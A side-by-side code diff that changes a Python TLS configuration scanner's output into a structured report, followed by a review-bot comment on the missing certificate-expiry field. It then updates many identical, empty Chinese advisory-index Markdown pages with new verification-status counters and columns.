status = f"{Colors.YELLOW}支持 (过时){Colors.END}" severity=severity,
print(f" {proto:<10} {status}") payload_or_probe={"issues": results["issues"], "protocols": results["protocols"], "hsts": results["hsts"]},
request_summary={"timeout": args.timeout, "certificate_present": bool(results["certificate"])},
if results["cipher"]: evidence_refs=evidence_refs,
print(f"\n{Colors.CYAN}当前密码套件:{Colors.END}") destructive_risk="low",
cipher_name, cipher_proto, cipher_bits = results["cipher"] args=args,
print(f" 名称: {cipher_name}") )
print(f" 协议: {cipher_proto}") text_lines = [
print(f" 密钥长度: {cipher_bits} bits") "=" * 60,
"TLS Scanner",
if results["certificate"]: "=" * 60,
print(f"\n{Colors.CYAN}证书信息:{Colors.END}") f"Target: {hostname}:{args.port}",
cert = results["certificate"] f"Issues: {len(results['issues'])}",
print(f" 主题: {cert['subject'].get('commonName', 'N/A')}") f"HSTS Enabled: {'yes' if results['hsts']['enabled'] else 'no'}",
print(f" 颁发者: {cert['issuer'].get('commonName', 'N/A')}") f"Status: {status}",
print(f" 有效期: {cert['not_before']} - {cert['not_after']}") ]
emit_report(args, report, text_lines)
print(f"\n{Colors.CYAN}HSTS:{Colors.END}")
if results["hsts"]["enabled"]:
print(f" 状态: {Colors.GREEN}已启用{Colors.END}")
print(f" Max-Age: {results['hsts']['max_age']}")
print(
f" IncludeSubDomains: {'' if results['hsts']['include_subdomains'] else ''}"
)
print(f" Preload: {'' if results['hsts']['preload'] else ''}")
else:
print(f" 状态: {Colors.RED}未启用{Colors.END}")
print(f"\n{Colors.CYAN}安全问题:{Colors.END}")
if results["issues"]:
for issue in sorted(results["issues"], key=lambda x: x["severity"]):
color = (
Colors.RED
if issue["severity"] in ["CRITICAL", "HIGH"]
else Colors.YELLOW
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" 建议: {issue['recommendation']}")
else:
print(f" {Colors.GREEN}未发现安全问题{Colors.END}")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
if __name__ == "__main__": if __name__ == "__main__":
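Review bot: `payload_or_probe` omits `results["cipher"]` and `results["certificate"]`, and the new `text_lines` no longer shows the protocol table, negotiated cipher or certificate validity window that the removed block printed, so without an evidence directory configured the certificate's `not_after` — the most actionable item a TLS check produces — appears nowhere in the output. Add `"cipher": results["cipher"], "certificate": results["certificate"]` to `payload_or_probe` and a line such as `f"Cert Expires: {results['certificate']['not_after'] if results['certificate'] else 'n/a'}"` to `text_lines`. The pre-existing `hostname = args.url.replace(...).split("/")[0]` also keeps a `host:port` suffix when the URL carries one, which then becomes both the scan target and the report's `target` string; `urllib.parse.urlsplit(args.url).hostname` would fix that if `urllib.parse` is available higher in the file. main() starts outside the hunk.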


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -29,6 +33,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -27,6 +31,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
